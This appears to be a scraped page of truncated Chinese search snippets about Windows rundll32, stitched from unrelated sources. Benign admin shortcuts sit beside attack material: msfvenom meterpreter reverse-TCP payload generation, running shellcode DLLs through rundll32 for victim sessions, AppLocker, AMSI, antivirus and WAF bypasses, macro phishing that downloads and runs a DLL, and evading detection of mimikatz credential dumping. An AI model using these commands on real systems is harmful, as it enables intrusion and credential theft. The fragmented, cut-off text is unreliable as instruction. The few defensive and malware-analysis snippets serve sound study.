下面是具体的Rundll32 的命令行列表: 添加删除程序 RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0 内容审查程序...User32.dll,SwapMouseButton 鼠标设置 Rundll32 Shell32.dll,Control_RunDLL main.cpl @0,0 映射网络驱动器....dll,OpenAs_RunDLL 任意文件名 打印机用户界面 Rundll32 Printui.dll,PrintUIEntry /? ...打印机管理 Rundll32 Shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder 电源设置 RunDll32.exe Shell32...Shell32.dll,Control_RunDLL HotPlug.dll 系统声音设置 Rundll32 Shell32.dll,Control_RunDLL Mmsys.cpl,
一、用法: rundll32 printui.dll,PrintUIEntry [options] [@commandfile] 二、参数大全: 参数 说明 /a[file] 二进制文件名 /b[name...\printer rem 在本地运行添加打印机向导: rundll32 printui.dll ,PrintUIEntry /il rem 在 \machine: 运行添加打印机向导 rundll32...\printer rem 枚举每个机器打印机连接: rundll32 printui.dll,PrintUIEntry /ge /c \machine rem 用 inf 添加打印机驱动程序: rundll32...: rundll32 printui.dll,PrintUIEntry /f “results.txt” /Xg /n “printer” rem 设置打印机设置命令使用: rundll32 printui.dll...: rundll32 printui.dll,PrintUIEntry /Sr /n “printer” /a “file.dat” rem 将二级打印机信息存入一个文件: rundll32 printui.dll
直接通过命令行工具或PowerShell文件运行PowerShell脚本; 导入PowerShell模块和执行PowerShell Cmdlet; 工具依赖 · .Net 4 工具使用 .dll版本 rundll32...rundll32 PowerShx.dll,main -e 需要运行的PS脚本 rundll32 PowerShx.dll,main -f 以参数形式传递和运行脚本 rundll32 PowerShx.dll,main -f -c 加载一个脚本并运行一个PS...cmdlet rundll32 PowerShx.dll,main -w 在一个新的窗口中开启一个交互式终端 rundll32 PowerShx.dll,main...-i 开启一个交互式终端 rundll32 PowerShx.dll,main -s 尝试绕过
@echo 现在清除Cookies @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 2 @echo 现在清除浏览历史 @Rundll32 InetCpl.cpl...,ClearMyTracksByProcess 1 @echo 现在清除临时文件夹 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 8 @echo 现在清除保存的密码...@Rundll32 InetCpl.cpl,ClearMyTracksByProcess 32 @echo 现在清除表单数据 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess...16 @echo 清除以上所有项目 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 255
用法 运行dll32 rundll32 PowerShx.dll,main -e rundll32 PowerShx.dll...,main -f Run the script passed as argument rundll32 PowerShx.dll,main -f <path...Start an interactive console in a new window rundll32 PowerShx.dll,main -i...Start an interactive console rundll32 PowerShx.dll,main -s Attempt to bypass...AMSI rundll32 PowerShx.dll,main -v Print Execution Output to the console 替代
axgg.exe 利用forfiles forfiles -P c:\windows\ /m *.prx /c "cmd /c c:\users\axingg\desktop\axgg.exe 利用rundll32...执行 rundll32 advpack.dll RegisterOCX axgg.exe 当然,rundll32还可以变形出很多 rundll32 url.dll,FileProtocolHandler...file://C:\Users\axingg\Desktop\axgg.exe rundll32 url.dll,OpenURL axgg.exe rundll32 zipfldr.dll, RouteTheCall...axgg.exe rundll32 javascript:".....巧用copy&&rename 比如我们的命令 rundll32 url.dll,FileProtocolHandler file://C:\Users\axingg\Desktop\axgg.exe copy
action { public static void main(String[] args) { Runtime rt=Runtime.getRuntime(); try { rt.exec("rundll32...action { public static void main(String[] args) { Runtime rt=Runtime.getRuntime(); try { rt.exec("rundll32...红目香薰\\index.html"); } catch (IOException e) { // TODO 自动生成的 catch 块 e.printStackTrace(); } } } rundll32
meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py # 最后一行有个命令 rundll32...xxxxxxxx rundll32 charlotte.dll, UehQD3rwWxT 运行payload C:\Windows\System32\rundll32.exe C:\Users\xr
今天看到一篇主题是关于解密远程url地址,然后下载回本地进行rundll32调用的宏钓鱼文章,觉得挺有意思,就复现下。 office宏钓鱼就不多说了,在之前红蓝对抗之邮件钓鱼攻击 也有所提及。...解码出url后,下来回来,然后调用rundll32执行。 但是当我利用360查杀时,发现会提示宏病毒: ?...最后成功调用rundll32执行下载回来的dll,虽然word文档不被查杀了,但是还是会被360查杀,会提示你调用rundll32了。
shell32.dll,Control_RunDLL mmsys.cpl,,0 # 麦克风 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1 打开控制面板 rundll32...shell32,Control_RunDLL 打开关于 查看系统版本 rundll32 shell32,ShellAboutA Info-Box 打开应用卸载页面 rundll32.exe shell32
现在,我们将PowerShell提示符导航至桌面,并使用rundll32来执行dll。 rundll32 ....现在,我们使用rundll32来执行dll。之所以使用rundll32,是因为它是一个不会被Applocker阻止的二进制文件。 rundll32 .
bypss 能执行起来)是正常能抓到的,也不会爆毒,但是 cs 默认的 logonpasswords 命令是会被拦截的,也就是会弹框,原因是 cs 中默认的 mimikatz 他的执行 是通过反射到 rundll32...这种新起进程的,反射行为正对 360 拦截的规则, 在实际的测试中,在 360 物理核晶的模式下,注入自己进程的进程是不会拦截的,所以这里 就想着把 logonpasswords 的执行代码给替换了,rundll32...: 执行函数 LogonPasswords: 然后: 然后: 然后: 然后: Spawn 方法源码: Inject 方法的源码: 具体实现如上,反射执行 dll,这里他默认是会派生一个 rundll32
我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。...我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。...二、用Rundll32.exe运行js或vbs的脚本代码 rundll32 javascript:"\.....三、用Rundll32.exe执行命令绕过杀毒软件的作法 命令如下: rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exerundll32...六、网上老生常谈的rundll32的几十个常用快捷命令了,可能有些人并不清楚 命令列: rundll32.exe shell32.dll,Control_RunDLL 功能: 显示控制面板 命令列: rundll32
基于白名单绕过 测试环境 攻击机:kali(192.168.2.12) 靶机:Win7(192.168.2.13) 靶机:Win10(192.168.2.4) ---- 基于白名单Rundll32上线...---- Rundll32是指32位的DLL文件,它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。...然后把刚刚MSF生成的 shellcode.dll 上传到目标服务器,加载rundll32.exe运行: rundll32.exe目录:C:\Windows\SysWOW64\rundll32.exe 运行:rundll32...Rundll32命令执行 rundll32.exe还可以执行命令,可绕过一些waf:(打开远程桌面) rundll32.exe javascript:"\..
interface ipv4 set address "本地连接" static 192.168.1.2 255.255.255.0 192.168.1.1 设置静态IP ---- 设置默认打印机 rundll32...printui.dll,PrintUIEntry /y /n "打印机名字" rundll32 printui.dll,PrintUIEntry /?
本次抓到的样本,通过利用atbroker.exe自启病毒母体,然后通过rundll32加载恶意模块,最后实现文件的md5修改、释放和执行挖矿程序。...释放并加载ibll文件后,接着起rundll32加载idTemp.data,函数入口CgvSEcXgGkbWwkFa。...接着rundll32调起Mine.exe(MD5:c849f42721cc0a0d66f405602126ecf0),运行参数 woshiyizhixiaomaolv ?
2、19%:签名的二进制进程执行 排名第二的攻击使用2种技术:Rundll32和Mshta。两者都允许攻击者通过受信任的签名二进制文件创建恶意代码。同样,攻击者使用的是离地攻击。...对此,建议企业可以为恶意使用的Rundll32设置警报,并且同样建立一个基线。 3、16%:创建和修改系统流程 Blue Mockingbird,这是利用Windows服务的单一威胁。
如何打开cpl 1.双击或者win+r xxx.cpl 2.control 3.rundll32 shell32.dll,Control_RunDLL 注意: 所有rundll32...当从命令行执行或单击时,control.exe 将control.exe file.cpl在Rundll32用于调用 CPL 的 API 函数(例如:)之前执行 CPL 文件(例如:)rundll32....CPL 文件可以通过 CPL API 函数直接执行,只需使用后面的Rundll32命令,这可能会绕过 control.exe 的检测和/或执行过滤器。
3 功能剖析 spawn(x86) case1,派生会话,原理是挂起方式启动rundll32并注入dll 接收到的数据: ?...使用VirtualAllocEx()在目标rundll32进程申请内存空间: ? ? WriteProcessMemory()在申请的内存空间写入dll: ? ?...Spawn(x64) case44,派生会话(x64),原理也是挂起线程rundll32线程注入dll,流程都是一样的,只是在不同文件夹在rundll32.exe ?
- Rasauto - Rasman - Remoteaccess - SENS - Sharedaccess - Tapisrv - Ntmssvc - wzcsvc C:/>rundll32...C:/>rundll32 svchostdll.dll,RundllUninstall iprip DeleteService(IPRIP) SUCCESS. 7....参考 Platform SDK: Tools - Rundll32 1) Inside Win32 Services, Part 2 by: Mark Russinovich, at: http...ArticleID=8943&pg=3 2) Platform SDK: Tools - Rundll32, at: http://msdn.microsoft.com/library/en-us/tools...Platform SDK: Tools - Rundll32, at: http://msdn.microsoft.com/library/en-us/tools/tools/rundll32.asp
领取专属 10元无门槛券
手把手带您无忧上云